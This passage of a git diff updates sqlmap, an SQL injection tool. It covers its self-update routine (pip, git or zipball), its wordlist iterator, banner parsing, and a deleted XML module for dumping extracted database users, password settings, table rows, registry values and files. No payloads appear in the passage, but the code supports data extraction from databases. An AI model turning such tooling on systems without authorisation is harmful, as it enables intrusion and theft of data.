EXCLUDE_UNESCAPE class Unescaper(AttribDict): def escape(self, expression, quote=True, dbms=None): - if conf.noEscape: - return expression - if expression is None: return expression @@ -25,10 +21,15 @@ def escape(self, expression, quote=True, dbms=None): identifiedDbms = Backend.getIdentifiedDbms() if dbms is not None: - return self[dbms](expression, quote=quote) - elif identifiedDbms is not None: - return self[identifiedDbms](expression, quote=quote) + retVal = self[dbms](expression, quote=quote) + elif identifiedDbms is not None and identifiedDbms in self: + retVal = self[identifiedDbms](expression, quote=quote) else: - return expression + retVal = expression + + # e.g. 
inference comparison for ' + retVal = retVal.replace("'''", "''''") + + return retVal unescaper = Unescaper() diff --git a/lib/core/update.py b/lib/core/update.py index 6a55b16a12b..78635ff39d8 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -1,67 +1,171 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import glob import os import re +import shutil +import subprocess import time - -from subprocess import PIPE -from subprocess import Popen as execute +import zipfile from lib.core.common import dataToStdout +from lib.core.common import extractRegexResult +from lib.core.common import getLatestRevision +from lib.core.common import getSafeExString +from lib.core.common import openFile from lib.core.common import pollProcess +from lib.core.common import readInput +from lib.core.convert import getText from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths from lib.core.revision import getRevisionNumber from lib.core.settings import GIT_REPOSITORY from lib.core.settings import IS_WIN +from lib.core.settings import VERSION +from lib.core.settings import TYPE +from lib.core.settings import ZIPBALL_PAGE +from thirdparty.six.moves import urllib as _urllib def update(): if not conf.updateAll: return success = False - rootDir = paths.SQLMAP_ROOT_PATH - if not os.path.exists(os.path.join(rootDir, ".git")): - errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)" - logger.error(errMsg) + if TYPE == "pip": + infoMsg = "updating sqlmap to the latest stable version from the " + infoMsg += "PyPI repository" + logger.info(infoMsg) + + debugMsg = "sqlmap will try to update itself using 'pip' command" + logger.debug(debugMsg) + + dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X")) + + output = "" + try: + process = subprocess.Popen("pip install -U sqlmap", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH) + pollProcess(process, True) + output, _ = process.communicate() + success = not process.returncode + except Exception as ex: + success = False + output = getSafeExString(ex) + finally: + output = getText(output) + + if success: + logger.info("%s the latest revision '%s'" % ("already at" if "already up-to-date" in output else "updated to", extractRegexResult(r"\binstalled sqlmap-(?P\d+\.\d+\.\d+)", output) or extractRegexResult(r"\((?P\d+\.\d+\.\d+)\)", output))) + else: + logger.error("update could not be completed ('%s')" % re.sub(r"[^a-z0-9:/\\]+", " ", output).strip()) + + elif not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): + warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository " + warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY + logger.warning(warnMsg) + + if VERSION == getLatestRevision(): + logger.info("already at the latest revision '%s'" % (getRevisionNumber() or VERSION)) + return + + message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? 
[y/N]" + if readInput(message, default='N', boolean=True): + directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) + + try: + open(os.path.join(directory, "sqlmap.py"), "w+b") + except Exception as ex: + errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex)) + logger.error(errMsg) + else: + attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode + for wildcard in ('*', ".*"): + for _ in glob.glob(os.path.join(directory, wildcard)): + try: + if os.path.isdir(_): + shutil.rmtree(_) + else: + os.remove(_) + except: + pass + + if glob.glob(os.path.join(directory, '*')): + errMsg = "unable to clear the content of directory '%s'" % directory + logger.error(errMsg) + else: + try: + archive = _urllib.request.urlretrieve(ZIPBALL_PAGE)[0] + + with zipfile.ZipFile(archive) as f: + for info in f.infolist(): + info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename) + if info.filename: + f.extract(info, directory) + + filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py") + if os.path.isfile(filepath): + with openFile(filepath, "r") as f: + version = re.search(r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1) + logger.info("updated to the latest version '%s#dev'" % version) + success = True + except Exception as ex: + logger.error("update could not be completed ('%s')" % getSafeExString(ex)) + else: + if not success: + logger.error("update could not be completed") + else: + try: + os.chmod(os.path.join(directory, "sqlmap.py"), attrs) + except OSError: + logger.warning("could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py")) + else: - infoMsg = "updating sqlmap to the latest development version from the " + infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" logger.info(infoMsg) debugMsg = "sqlmap will try to update itself using 'git' command" logger.debug(debugMsg) - dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) - process = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE) - pollProcess(process, True) - stdout, stderr = process.communicate() - success = not process.returncode + dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X")) + + output = "" + try: + process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH) + pollProcess(process, True) + output, _ = process.communicate() + success = not process.returncode + except Exception as ex: + success = False + output = getSafeExString(ex) + finally: + output = getText(output) if success: - import lib.core.settings - _ = lib.core.settings.REVISION = getRevisionNumber() - logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _)) + logger.info("%s the latest revision '%s'" % ("already at" if "Already" in output else "updated to", getRevisionNumber())) else: - logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) + if "Not a git repository" in output: + errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " + errMsg += "from GitHub (e.g. 
'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY + logger.error(errMsg) + else: + logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", output).strip()) if not success: if IS_WIN: infoMsg = "for Windows platform it's recommended " infoMsg += "to use a GitHub for Windows client for updating " - infoMsg += "purposes (http://windows.github.com/) or just " + infoMsg += "purposes (https://desktop.github.com/) or just " infoMsg += "download the latest snapshot from " - infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads" + infoMsg += "https://github.com/sqlmapproject/sqlmap/releases" else: - infoMsg = "for Linux platform it's required " - infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')" + infoMsg = "for Linux platform it's recommended " + infoMsg += "to install a standard 'git' package (e.g.: 'apt install git')" logger.info(infoMsg) diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py index b18f7c46beb..1bb8e42bf2f 100644 --- a/lib/core/wordlist.py +++ b/lib/core/wordlist.py @@ -1,26 +1,36 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import os import zipfile +from lib.core.common import getSafeExString +from lib.core.common import isZipFile from lib.core.exception import SqlmapDataException -from lib.core.settings import UNICODE_ENCODING +from lib.core.exception import SqlmapInstallationException +from thirdparty import six -class Wordlist(object): +class Wordlist(six.Iterator): """ Iterator for looping over a large dictionaries + + >>> from lib.core.option import paths + >>> isinstance(next(Wordlist(paths.SMALL_DICT)), six.binary_type) + True + >>> isinstance(next(Wordlist(paths.WORDLIST)), six.binary_type) + True """ def __init__(self, filenames, proc_id=None, proc_count=None, custom=None): - self.filenames = filenames + self.filenames = [filenames] if isinstance(filenames, six.string_types) else filenames self.fp = None + self.zip_file = None self.index = 0 self.counter = -1 + self.current = None self.iter = None self.custom = custom or [] self.proc_id = proc_id @@ -33,19 +43,25 @@ def __iter__(self): def adjust(self): self.closeFP() if self.index > len(self.filenames): - raise StopIteration + return # Note: https://stackoverflow.com/a/30217723 (PEP 479) elif self.index == len(self.filenames): self.iter = iter(self.custom) else: - current = self.filenames[self.index] - if os.path.splitext(current)[1].lower() == ".zip": - _ = zipfile.ZipFile(current, 'r') - if len(_.namelist()) == 0: - errMsg = "no file(s) inside '%s'" % current + self.current = self.filenames[self.index] + if isZipFile(self.current): + try: + self.zip_file = zipfile.ZipFile(self.current, 'r') + except zipfile.error as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). 
Please make " % (self.current, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + if len(self.zip_file.namelist()) == 0: + errMsg = "no file(s) inside '%s'" % self.current raise SqlmapDataException(errMsg) - self.fp = _.open(_.namelist()[0]) + self.fp = self.zip_file.open(self.zip_file.namelist()[0]) else: - self.fp = open(current, 'r') + self.fp = open(self.current, "rb") self.iter = iter(self.fp) self.index += 1 @@ -55,19 +71,24 @@ def closeFP(self): self.fp.close() self.fp = None - def next(self): + if self.zip_file: + self.zip_file.close() + self.zip_file = None + + def __next__(self): retVal = None while True: self.counter += 1 try: - retVal = self.iter.next().rstrip() + retVal = next(self.iter).rstrip() + except zipfile.error as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) except StopIteration: self.adjust() - retVal = self.iter.next().rstrip() - try: - retVal = retVal.decode(UNICODE_ENCODING) - except UnicodeDecodeError: - continue + retVal = next(self.iter).rstrip() if not self.proc_count or self.counter % self.proc_count == self.proc_id: break return retVal diff --git a/lib/core/xmldump.py b/lib/core/xmldump.py deleted file mode 100644 index 83525c07bf4..00000000000 --- a/lib/core/xmldump.py +++ /dev/null @@ -1,536 +0,0 @@ -#!/usr/bin/env python - -import codecs -import os -import re -import xml - -import xml.sax.saxutils as saxutils - -from lib.core.common import getUnicode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapFilePathException -from lib.core.settings import UNICODE_ENCODING -from thirdparty.prettyprint import prettyprint -from xml.dom.minidom import Document -from xml.parsers.expat import ExpatError - -TECHNIC_ELEM_NAME = "Technic" -TECHNICS_ELEM_NAME = "Technics" -BANNER_ELEM_NAME = "Banner" -COLUMNS_ELEM_NAME = "DatabaseColumns" -COLUMN_ELEM_NAME = "Column" -CELL_ELEM_NAME = "Cell" -COLUMN_ATTR = "column" -ROW_ELEM_NAME = "Row" -TABLES_ELEM_NAME = "tables" -DATABASE_COLUMNS_ELEM = "DB" -DB_TABLES_ELEM_NAME = "DBTables" -DB_TABLE_ELEM_NAME = "DBTable" -IS_DBA_ELEM_NAME = "isDBA" -FILE_CONTENT_ELEM_NAME = "FileContent" -DB_ATTR = "db" -UNKNOWN_COLUMN_TYPE = "unknown" -USER_SETTINGS_ELEM_NAME = "UserSettings" -USER_SETTING_ELEM_NAME = "UserSetting" -USERS_ELEM_NAME = "Users" -USER_ELEM_NAME = "User" -DB_USER_ELEM_NAME = "DBUser" -SETTINGS_ELEM_NAME = "Settings" -DBS_ELEM_NAME = "DBs" -DB_NAME_ELEM_NAME = "DBName" -DATABASE_ELEM_NAME = "Database" -TABLE_ELEM_NAME = "Table" -DB_TABLE_VALUES_ELEM_NAME = "DBTableValues" -DB_VALUES_ELEM = "DBValues" -QUERIES_ELEM_NAME = "Queries" -QUERY_ELEM_NAME = "Query" -REGISTERY_ENTRIES_ELEM_NAME = "RegistryEntries" -REGISTER_DATA_ELEM_NAME = "RegisterData" -DEFAULT_DB = "All" -MESSAGE_ELEM = "Message" -MESSAGES_ELEM_NAME = "Messages" -ERROR_ELEM_NAME = "Error" -LST_ELEM_NAME = "List" -LSTS_ELEM_NAME = "Lists" -CURRENT_USER_ELEM_NAME = "CurrentUser" -CURRENT_DB_ELEM_NAME = "CurrentDB" -MEMBER_ELEM = "Member" -ADMIN_USER = "Admin" -REGULAR_USER = "User" -STATUS_ELEM_NAME = "Status" -RESULTS_ELEM_NAME = "Results" -UNHANDLED_PROBLEM_TYPE = "Unhandled" -NAME_ATTR = "name" -TYPE_ATTR = "type" -VALUE_ATTR = "value" -SUCESS_ATTR = "success" -NAME_SPACE_ATTR = 
'http://www.w3.org/2001/XMLSchema-instance' -XMLNS_ATTR = "xmlns:xsi" -SCHEME_NAME = "sqlmap.xsd" -SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation" -CHARACTERS_TO_ENCODE = range(32) + range(127, 256) -ENTITIES = {'"': '"', "'": "'"} - -class XMLDump(object): - ''' - This class purpose is to dump the data into an xml Format. - The format of the xml file is described in the scheme file xml/sqlmap.xsd - ''' - - def __init__(self): - self._outputFile = None - self._outputFP = None - self.__root = None - self.__doc = Document() - - def _addToRoot(self, element): - ''' - Adds element to the root element - ''' - self.__root.appendChild(element) - - def __write(self, data, n=True): - ''' - Writes the data into the file - ''' - if n: - self._outputFP.write("%s\n" % data) - else: - self._outputFP.write("%s " % data) - - self._outputFP.flush() - - kb.dataOutputFlag = True - - def _getRootChild(self, elemName): - ''' - Returns the child of the root with the described name - ''' - elements = self.__root.getElementsByTagName(elemName) - if elements: - return elements[0] - - return elements - - def _createTextNode(self, data): - ''' - Creates a text node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - if data is None: - return self.__doc.createTextNode(u'') - else: - escaped_data = saxutils.escape(data, ENTITIES) - return self.__doc.createTextNode(escaped_data) - - def _createAttribute(self, attrName, attrValue): - ''' - Creates an attribute node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - attr = self.__doc.createAttribute(attrName) - if attrValue is None: - attr.nodeValue = u'' - else: - attr.nodeValue = getUnicode(attrValue) - return attr - - def string(self, header, data, sort=True): - ''' - Adds string element to the xml. 
- ''' - if isinstance(data, (list, tuple, set)): - self.lister(header, data, sort) - return - - messagesElem = self._getRootChild(MESSAGES_ELEM_NAME) - if (not(messagesElem)): - messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME) - self._addToRoot(messagesElem) - - if data: - data = self._formatString(data) - else: - data = "" - - elem = self.__doc.createElement(MESSAGE_ELEM) - elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - elem.appendChild(self._createTextNode(data)) - messagesElem.appendChild(elem) - - def lister(self, header, elements, sort=True): - ''' - Adds information formatted as list element - ''' - lstElem = self.__doc.createElement(LST_ELEM_NAME) - lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - if elements: - if sort: - try: - elements = set(elements) - elements = list(elements) - elements.sort(key=lambda x: x.lower()) - except: - pass - - for element in elements: - memberElem = self.__doc.createElement(MEMBER_ELEM) - lstElem.appendChild(memberElem) - if isinstance(element, basestring): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElem.appendChild(self._createTextNode(element)) - elif isinstance(element, (list, tuple, set)): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list")) - for e in element: - memberElemStr = self.__doc.createElement(MEMBER_ELEM) - memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElemStr.appendChild(self._createTextNode(getUnicode(e))) - memberElem.appendChild(memberElemStr) - listsElem = self._getRootChild(LSTS_ELEM_NAME) - if not(listsElem): - listsElem = self.__doc.createElement(LSTS_ELEM_NAME) - self._addToRoot(listsElem) - listsElem.appendChild(lstElem) - - def technic(self, technicType, data): - ''' - Adds information about the technic used to extract data from the db - ''' - technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME) - technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType)) - textNode = self._createTextNode(data) - technicElem.appendChild(textNode) - technicsElem = self._getRootChild(TECHNICS_ELEM_NAME) - if not(technicsElem): - technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME) - self._addToRoot(technicsElem) - technicsElem.appendChild(technicElem) - - def banner(self, data): - ''' - Adds information about the database banner to the xml. - The banner contains information about the type and the version of the database. 
- ''' - bannerElem = self.__doc.createElement(BANNER_ELEM_NAME) - bannerElem.appendChild(self._createTextNode(data)) - self._addToRoot(bannerElem) - - def currentUser(self, data): - ''' - Adds information about the current database user to the xml - ''' - currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME) - textNode = self._createTextNode(data) - currentUserElem.appendChild(textNode) - self._addToRoot(currentUserElem) - - def currentDb(self, data): - ''' - Adds information about the current database is use to the xml - ''' - currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME) - textNode = self._createTextNode(data) - currentDBElem.appendChild(textNode) - self._addToRoot(currentDBElem) - - def dba(self, isDBA): - ''' - Adds information to the xml that indicates whether the user has DBA privileges - ''' - isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME) - isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA))) - self._addToRoot(isDBAElem) - - def users(self, users): - ''' - Adds a list of the existing users to the xml - ''' - usersElem = self.__doc.createElement(USERS_ELEM_NAME) - if isinstance(users, basestring): - users = [users] - if users: - for user in users: - userElem = self.__doc.createElement(DB_USER_ELEM_NAME) - usersElem.appendChild(userElem) - userElem.appendChild(self._createTextNode(user)) - self._addToRoot(usersElem) - - def dbs(self, dbs): - ''' - Adds a list of the existing databases to the xml - ''' - dbsElem = self.__doc.createElement(DBS_ELEM_NAME) - if dbs: - for db in dbs: - dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME) - dbsElem.appendChild(dbElem) - dbElem.appendChild(self._createTextNode(db)) - self._addToRoot(dbsElem) - - def userSettings(self, header, userSettings, subHeader): - ''' - Adds information about the user's settings to the xml. - The information can be user's passwords, privileges and etc.. 
- ''' - self._areAdmins = set() - userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME) - if (not(userSettingsElem)): - userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME) - self._addToRoot(userSettingsElem) - - userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME) - userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - - if isinstance(userSettings, (tuple, list, set)): - self._areAdmins = userSettings[1] - userSettings = userSettings[0] - - users = userSettings.keys() - users.sort(key=lambda x: x.lower()) - - for user in users: - userElem = self.__doc.createElement(USER_ELEM_NAME) - userSettingElem.appendChild(userElem) - if user in self._areAdmins: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER)) - else: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER)) - - settings = userSettings[user] - - settings.sort() - - for setting in settings: - settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME) - settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader)) - settingTextNode = self._createTextNode(setting) - settingsElem.appendChild(settingTextNode) - userElem.appendChild(settingsElem) - userSettingsElem.appendChild(userSettingElem) - - def dbTables(self, dbTables): - ''' - Adds information of the existing db tables to the xml - ''' - if not isinstance(dbTables, dict): - self.string(TABLES_ELEM_NAME, dbTables) - return - - dbTablesElem = self.__doc.createElement(DB_TABLES_ELEM_NAME) - - for db, tables in dbTables.items(): - tables.sort(key=lambda x: x.lower()) - dbElem = self.__doc.createElement(DATABASE_ELEM_NAME) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - dbTablesElem.appendChild(dbElem) - for table in tables: - tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME) - tableElem.appendChild(self._createTextNode(table)) - dbElem.appendChild(tableElem) - self._addToRoot(dbTablesElem) - - def dbTableColumns(self, tableColumns): - ''' - Adds information about the columns of the existing tables to the xml - ''' - - columnsElem = self._getRootChild(COLUMNS_ELEM_NAME) - if not(columnsElem): - columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME) - - for db, tables in tableColumns.items(): - if not db: - db = DEFAULT_DB - dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - columnsElem.appendChild(dbElem) - - for table, columns in tables.items(): - tableElem = self.__doc.createElement(TABLE_ELEM_NAME) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - colList = columns.keys() - colList.sort(key=lambda x: x.lower()) - - for column in colList: - colType = columns[column] - colElem = self.__doc.createElement(COLUMN_ELEM_NAME) - if colType is not None: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType)) - else: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE)) - colElem.appendChild(self._createTextNode(column)) - tableElem.appendChild(colElem) - - self._addToRoot(columnsElem) - - def dbTableValues(self, tableValues): - ''' - Adds the values of specific table to the xml. - The values are organized according to the relevant row and column. 
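# Illustrative sketch (not from the sqlmap source): the XML shape produced by the
# removed dbTableValues(), rebuilt with plain minidom and invented sample data so
# the docstring above ("organized according to the relevant row and column") is
# concrete. Element and attribute names come from the constants defined earlier
# in this (deleted) module:

from xml.dom.minidom import Document

doc = Document()
table = doc.createElement("DBTableValues")   # DB_TABLE_VALUES_ELEM_NAME
table.setAttribute("db", "testdb")           # DB_ATTR (sample value)
table.setAttribute("name", "users")          # NAME_ATTR (sample value)
row = doc.createElement("Row")               # ROW_ELEM_NAME
for column, value in (("id", "1"), ("name", "luther")):
    cell = doc.createElement("Cell")         # CELL_ELEM_NAME
    cell.setAttribute("column", column)      # COLUMN_ATTR
    cell.appendChild(doc.createTextNode(value))
    row.appendChild(cell)
table.appendChild(row)
doc.appendChild(table)
print(doc.toprettyxml(indent="  "))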
- ''' - tableElem = self.__doc.createElement(DB_TABLE_VALUES_ELEM_NAME) - if (tableValues is not None): - db = tableValues["__infos__"]["db"] - if not db: - db = "All" - table = tableValues["__infos__"]["table"] - - count = int(tableValues["__infos__"]["count"]) - columns = tableValues.keys() - columns.sort(key=lambda x: x.lower()) - - tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db)) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - for i in range(count): - rowElem = self.__doc.createElement(ROW_ELEM_NAME) - tableElem.appendChild(rowElem) - for column in columns: - if column != "__infos__": - info = tableValues[column] - value = info["values"][i] - - if re.search("^[\ *]*$", value): - value = "NULL" - - cellElem = self.__doc.createElement(CELL_ELEM_NAME) - cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column)) - cellElem.appendChild(self._createTextNode(value)) - rowElem.appendChild(cellElem) - - dbValuesElem = self._getRootChild(DB_VALUES_ELEM) - if (not(dbValuesElem)): - dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM) - self._addToRoot(dbValuesElem) - - dbValuesElem.appendChild(tableElem) - - logger.info("Table '%s.%s' dumped to XML file" % (db, table)) - - def dbColumns(self, dbColumns, colConsider, dbs): - ''' - Adds information about the columns - ''' - for column in dbColumns.keys(): - printDbs = {} - for db, tblData in dbs.items(): - for tbl, colData in tblData.items(): - for col, dataType in colData.items(): - if column in col: - if db in printDbs: - if tbl in printDbs[db]: - printDbs[db][tbl][col] = dataType - else: - printDbs[db][tbl] = {col: dataType} - else: - printDbs[db] = {} - printDbs[db][tbl] = {col: dataType} - - continue - - self.dbTableColumns(printDbs) - - def query(self, query, queryRes): - ''' - Adds details of an executed query to the xml. - The query details are the query itself and it's results. - ''' - queryElem = self.__doc.createElement(QUERY_ELEM_NAME) - queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query)) - queryElem.appendChild(self._createTextNode(queryRes)) - queriesElem = self._getRootChild(QUERIES_ELEM_NAME) - if (not(queriesElem)): - queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME) - self._addToRoot(queriesElem) - queriesElem.appendChild(queryElem) - - def registerValue(self, registerData): - ''' - Adds information about an extracted registry key to the xml - ''' - registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME) - registerElem.appendChild(self._createTextNode(registerData)) - registriesElem = self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME) - if (not(registriesElem)): - registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME) - self._addToRoot(registriesElem) - registriesElem.appendChild(registerElem) - - def rFile(self, filePath, data): - ''' - Adds an extracted file's content to the xml - ''' - fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME) - fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath)) - fileContentElem.appendChild(self._createTextNode(data)) - self._addToRoot(fileContentElem) - - def setOutputFile(self): - ''' - Initiates the xml file from the configuration. 
- ''' - if (conf.xmlFile): - try: - self._outputFile = conf.xmlFile - self.__root = None - - if os.path.exists(self._outputFile): - try: - self.__doc = xml.dom.minidom.parse(self._outputFile) - self.__root = self.__doc.childNodes[0] - except ExpatError: - self.__doc = Document() - - self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING) - - if self.__root is None: - self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME) - self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR)) - self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME)) - self.__doc.appendChild(self.__root) - except IOError: - raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile) - - def getOutputFile(self): - return self._outputFile - - def finish(self, resultStatus, resultMsg=""): - ''' - Finishes the dumper operation: - 1. Adds the session status to the xml - 2. Writes the xml to the file - 3. Closes the xml file - ''' - if ((self._outputFP is not None) and not(self._outputFP.closed)): - statusElem = self.__doc.createElement(STATUS_ELEM_NAME) - statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus))) - - if not resultStatus: - errorElem = self.__doc.createElement(ERROR_ELEM_NAME) - - if isinstance(resultMsg, Exception): - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__)) - else: - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE)) - - errorElem.appendChild(self._createTextNode(getUnicode(resultMsg))) - statusElem.appendChild(errorElem) - - self._addToRoot(statusElem) - self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING)) - self._outputFP.close() - - -def closeDumper(status, msg=""): - """ - Closes the dumper of the session - """ - - if hasattr(conf, "dumper") and hasattr(conf.dumper, "finish"): - conf.dumper.finish(status, msg) - -dumper = XMLDump() diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/parse/__init__.py +++ b/lib/parse/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/parse/banner.py b/lib/parse/banner.py index be6ffa9ca56..c4eef8c274c 100644 --- a/lib/parse/banner.py +++ b/lib/parse/banner.py @@ -1,15 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from xml.sax.handler import ContentHandler -from lib.core.common import checkFile from lib.core.common import Backend from lib.core.common import parseXmlFile from lib.core.common import sanitizeStr @@ -27,7 +26,7 @@ class MSSQLBannerHandler(ContentHandler): def __init__(self, banner, info): ContentHandler.__init__(self) - self._banner = sanitizeStr(banner) + self._banner = sanitizeStr(banner or "") self._inVersion = False self._inServicePack = False self._release = None @@ -54,16 +53,16 @@ def startElement(self, name, attrs): elif name == "servicepack": self._inServicePack = True - def characters(self, data): + def characters(self, content): if self._inVersion: - self._version 
+= sanitizeStr(data) + self._version += sanitizeStr(content) elif self._inServicePack: - self._servicePack += sanitizeStr(data) + self._servicePack += sanitizeStr(content) def endElement(self, name): if name == "signature": for version in (self._version, self._versionAlt): - if version and re.search(r" %s[\.\ ]+" % version, self._banner): + if version and self._banner and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner): self._feedInfo("dbmsRelease", self._release) self._feedInfo("dbmsVersion", self._version) self._feedInfo("dbmsServicePack", self._servicePack) @@ -104,8 +103,6 @@ def bannerParser(banner): if not xmlfile: return - checkFile(xmlfile) - if Backend.isDbms(DBMS.MSSQL): handler = MSSQLBannerHandler(banner, kb.bannerFp) parseXmlFile(xmlfile, handler) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 2cabc112b32..ffba577c24e 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -1,779 +1,1143 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + +import os +import re +import shlex import sys -from optparse import OptionError -from optparse import OptionGroup -from optparse import OptionParser -from optparse import SUPPRESS_HELP +try: + from optparse import OptionError as ArgumentError + from optparse import OptionGroup + from optparse import OptionParser as ArgumentParser + from optparse import SUPPRESS_HELP as SUPPRESS + + ArgumentParser.add_argument = ArgumentParser.add_option + + def _add_argument_group(self, *args, **kwargs): + return self.add_option_group(OptionGroup(self, *args, **kwargs)) + + ArgumentParser.add_argument_group = 